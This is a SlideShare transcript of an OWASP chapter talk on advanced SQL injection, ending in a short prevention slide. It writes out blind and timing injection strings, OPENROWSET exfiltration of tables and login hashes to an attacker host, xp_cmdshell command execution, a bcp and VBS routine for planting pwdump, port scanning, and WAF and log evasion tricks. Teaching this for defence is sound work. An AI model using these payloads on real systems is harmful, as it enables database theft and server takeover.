SlideShare a Scribd company logo

Owasp Indy Q2 2012 Advanced SQLi

Download as PPTX, PDF
O
owaspindy

The document provides an overview of advanced SQL injection techniques, including blind SQL injection, data exfiltration, privilege escalation, command execution, uploading files, internal database server exploration, port scanning, and evasion techniques to bypass firewalls and web application firewalls. Specific examples are given for each technique using SQL Server, MySQL, Oracle, and other databases. Prevention methods are also discussed, such as input sanitization, prepared statements, stored procedures, principle of least privilege, and using a web application firewall.

Technology
1 of 34
Advanced SQLi and Evasion Techniques
About Me Introduction Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
Credit Cesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdf ModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.html Avi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics • Dynamic construction of SQL queries “SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'” • Unsanitized user input uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd ='' • Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
Advance SQLi Techniques • Blind SQL Injection • Data Exfiltration • Privilege Escalation • Command Execution • Uploading Files • Internal DB Server Exploration • Port Scanning • Firewall Evasion • Log Evasion • WAF Evasion
Blind SQL Injection
Blind SQL Injection • Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.) • Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st' o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.) • Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY '0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers • OPENROWSET Example: SELECT * FROM OPENROWSET( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' 'SELECT * FROM table' ) • OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' ) .DatabaseName.dbo.TableName
Data Exfiltration • Remote server INSERT Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM table2
Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysobjects ') SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _syscolumns') SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM databasename..table1 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table2') SELECT * FROM databasename..table2 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', ‘SELECT * FROM _sysxlogins') SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation • Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt • Often not required o Connection strings using SA, dbo, sysadmin o Web service context
Command Execution Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files On attacker’s server… 1. CREATE TABLE AttackerTable (data text) 2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW') On victim’s server… 3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d' 4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo','AttackersAlias','REG_SZ' ,'DBMSSOCN,AttackersIP,80' 5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d'
Uploading Files (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC xp_cmdshell '"first script line" >> script.vbs' … EXEC xp_cmdshell '"second script line" >> script.vbs' ... EXEC xp_cmdshell '"last script line" >> script.vbs' EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration • Linked and Remote Servers 1. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM master.dbo.sysservers 2. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM linkedserver1.master.dbo.sysservers 3. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM linkedserver1.master.dbo.sysdatabases 4. Rinse and repeat…
Port Scanning Example: SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', 'SELECT * FROM table')
Evasion Techniques
Firewall Evasion • Use port 80 for outbound Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', 'SELECT * FROM table1') SELECT * FROM table2
Log Evasion • Inject using POST parameters • Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
WAF Evasion • Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM… • New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.) • Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.) • Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
SQL Injection Prevention
SQLi Prevention • Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.) • Prepared Statements/Parameterized Queries • Stored Procedures • Accounts with Least Privilege • Enable DisallowAdhocAccess registry setting for MS SQL Server • Perform Self Assessments • Use a Web Application Firewall • Filter Outbound Traffic at Firewall
Q&A

Recommended

Learning Dtrace
Learning DtraceLearning Dtrace
Learning Dtrace
JeongHun Byeon
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Tugas 2
Tugas 2Tugas 2
Tugas 2
Novi_Wahyuni
 
Fia fabila
Fia fabilaFia fabila
Fia fabila
fiafabila
 
201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian
KhairunnisaPekanbaru
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloud
NUTC, imac
 
Java设置环境变量
Java设置环境变量Java设置环境变量
Java设置环境变量
Zianed Hou
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作
NUTC, imac
 

Recommended

Learning Dtrace
Learning DtraceLearning Dtrace
Learning Dtrace
JeongHun Byeon
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Tugas 2
Tugas 2Tugas 2
Tugas 2
Novi_Wahyuni
 
Fia fabila
Fia fabilaFia fabila
Fia fabila
fiafabila
 
201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian201913001 khairunnisa progres_harian
201913001 khairunnisa progres_harian
KhairunnisaPekanbaru
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloud
NUTC, imac
 
Java设置环境变量
Java设置环境变量Java设置环境变量
Java设置环境变量
Zianed Hou
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作
NUTC, imac
 
使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台
NUTC, imac
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
appsec
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
Paula Januszkiewicz
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management System
NeerajMudgal1
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
Rishi Bhargava
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Paula Januszkiewicz
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploy
Simon Su
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programming
Ante Gulam
 
Java assgn
Java assgnJava assgn
Java assgn
aa11bb11
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
ZuzannaKornecka
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)
Anar Godjaev
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digest
Pythian
 
Noinject
NoinjectNoinject
Noinject
Justin Swanhart
 
Custom faultpolicies
Custom faultpoliciesCustom faultpolicies
Custom faultpolicies
XAVIERCONSULTANTS
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffs
Yukiya Hayashi
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Nantes Jug - Java 7
Nantes Jug - Java 7Nantes Jug - Java 7
Nantes Jug - Java 7
Sébastien Prunier
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
caswenson
 
Java security
Java securityJava security
Java security
Bart Blommaerts
 
Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overview
owaspindy
 
Google Search Cheat Sheet
Google Search Cheat SheetGoogle Search Cheat Sheet
Google Search Cheat Sheet
Tiffany Hamburg Hamburg
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2
Mostafa Hashkil
 

More Related Content

What's hot

使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台
NUTC, imac
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
appsec
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
Paula Januszkiewicz
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management System
NeerajMudgal1
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
Rishi Bhargava
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Paula Januszkiewicz
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploy
Simon Su
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programming
Ante Gulam
 
Java assgn
Java assgnJava assgn
Java assgn
aa11bb11
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
ZuzannaKornecka
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)
Anar Godjaev
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digest
Pythian
 
Noinject
NoinjectNoinject
Noinject
Justin Swanhart
 
Custom faultpolicies
Custom faultpoliciesCustom faultpolicies
Custom faultpolicies
XAVIERCONSULTANTS
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffs
Yukiya Hayashi
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Nantes Jug - Java 7
Nantes Jug - Java 7Nantes Jug - Java 7
Nantes Jug - Java 7
Sébastien Prunier
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
caswenson
 
Java security
Java securityJava security
Java security
Bart Blommaerts
 

What's hot (19)

使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
DPAPI AND DPAPI-NG: Decryption toolkit. Black Hat 2017
 
Wwe Management System
Wwe Management SystemWwe Management System
Wwe Management System
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
 
Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploy
 
Secure .NET programming
Secure .NET programmingSecure .NET programming
Secure .NET programming
 
Java assgn
Java assgnJava assgn
Java assgn
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Flashback (Practical Test)
Flashback (Practical Test)Flashback (Practical Test)
Flashback (Practical Test)
 
Maximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digestMaximizing SQL Reviews and Tuning with pt-query-digest
Maximizing SQL Reviews and Tuning with pt-query-digest
 
Noinject
NoinjectNoinject
Noinject
 
Custom faultpolicies
Custom faultpoliciesCustom faultpolicies
Custom faultpolicies
 
How to get rid of terraform plan diffs
How to get rid of terraform plan diffsHow to get rid of terraform plan diffs
How to get rid of terraform plan diffs
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Nantes Jug - Java 7
Nantes Jug - Java 7Nantes Jug - Java 7
Nantes Jug - Java 7
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
 
Java security
Java securityJava security
Java security
 

Viewers also liked

Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overview
owaspindy
 
Google Search Cheat Sheet
Google Search Cheat SheetGoogle Search Cheat Sheet
Google Search Cheat Sheet
Tiffany Hamburg Hamburg
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2
Mostafa Hashkil
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheet
Martin Cabrera
 
Business analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasksBusiness analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasks
Mostafa Hashkil
 
Introduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиранеIntroduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиране
Intro C# Book
 
Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00
Nicole Cordes
 
Linux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for BeginnersLinux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for Beginners
Davide Ciambelli
 
Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014
Noé Fernández-Pozo
 
Linux cheat-sheet
Linux cheat-sheetLinux cheat-sheet
Linux cheat-sheet
Craig Cannon
 
Rework cheat sheet
Rework cheat sheetRework cheat sheet
Rework cheat sheet
Kenneth Svenningsen
 
REST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat SheetREST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat Sheet
Markus Tacker
 
Social Platform Cheat Sheet
Social Platform Cheat SheetSocial Platform Cheat Sheet
Social Platform Cheat Sheet
360i
 
Python Cheat Sheet
Python Cheat SheetPython Cheat Sheet
Python Cheat Sheet
GlowTouch
 
Scrum Cheat Sheet
Scrum Cheat SheetScrum Cheat Sheet
Scrum Cheat Sheet
Edwin Ritter
 
Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03
JABVAB
 
Composting
CompostingComposting
Composting
Download1337
 
Effective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat SheetEffective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat Sheet
Jan Schrage
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
Mike Saunders
 
Principles of microservices velocity
Principles of microservices velocityPrinciples of microservices velocity
Principles of microservices velocity
Sam Newman
 

Viewers also liked (20)

Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overview
 
Google Search Cheat Sheet
Google Search Cheat SheetGoogle Search Cheat Sheet
Google Search Cheat Sheet
 
Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2Regular Expressions cheat-sheet v2
Regular Expressions cheat-sheet v2
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheet
 
Business analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasksBusiness analyst titles, knowledge and tasks
Business analyst titles, knowledge and tasks
 
Introduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиранеIntroduction to Programming with C# Book - книга за C# програмиране
Introduction to Programming with C# Book - книга за C# програмиране
 
Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00Vi Cheat Sheet v 1 00
Vi Cheat Sheet v 1 00
 
Linux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for BeginnersLinux Bash Shell Cheat Sheet for Beginners
Linux Bash Shell Cheat Sheet for Beginners
 
Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014Unix Command-Line Cheat Sheet BTI2014
Unix Command-Line Cheat Sheet BTI2014
 
Linux cheat-sheet
Linux cheat-sheetLinux cheat-sheet
Linux cheat-sheet
 
Rework cheat sheet
Rework cheat sheetRework cheat sheet
Rework cheat sheet
 
REST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat SheetREST HTTP Response Codes Cheat Sheet
REST HTTP Response Codes Cheat Sheet
 
Social Platform Cheat Sheet
Social Platform Cheat SheetSocial Platform Cheat Sheet
Social Platform Cheat Sheet
 
Python Cheat Sheet
Python Cheat SheetPython Cheat Sheet
Python Cheat Sheet
 
Scrum Cheat Sheet
Scrum Cheat SheetScrum Cheat Sheet
Scrum Cheat Sheet
 
Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03Designers Cheat Sheet Illustrated 03
Designers Cheat Sheet Illustrated 03
 
Composting
CompostingComposting
Composting
 
Effective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat SheetEffective 15-minute presentations - Cheat Sheet
Effective 15-minute presentations - Cheat Sheet
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
Principles of microservices velocity
Principles of microservices velocityPrinciples of microservices velocity
Principles of microservices velocity
 

Similar to Owasp Indy Q2 2012 Advanced SQLi

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
Mizno Kruge
 
Database security
Database securityDatabase security
Database security
Rambabu Duddukuri
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
guest785f78
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
Damien Seguy
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
hameedkhan2017
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
Eoin Keary
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
fangjiafu
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
Colin O'Dell
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
Tjylen Veselyj
 
JDBC Tutorial
JDBC TutorialJDBC Tutorial
JDBC Tutorial
Information Technology
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
owaspsd
 
Raj mysql
Raj mysqlRaj mysql
Raj mysql
firstplanet
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Invenire Aude
 
Lecture17
Lecture17Lecture17
Lecture17
vantinhkhuc
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
sandeep54552
 
Python with MySql.pptx
Python with MySql.pptxPython with MySql.pptx
Python with MySql.pptx
Ramakrishna Reddy Bijjam
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
Prathan Phongthiproek
 

Similar to Owasp Indy Q2 2012 Advanced SQLi (20)

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
Database security
Database securityDatabase security
Database security
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
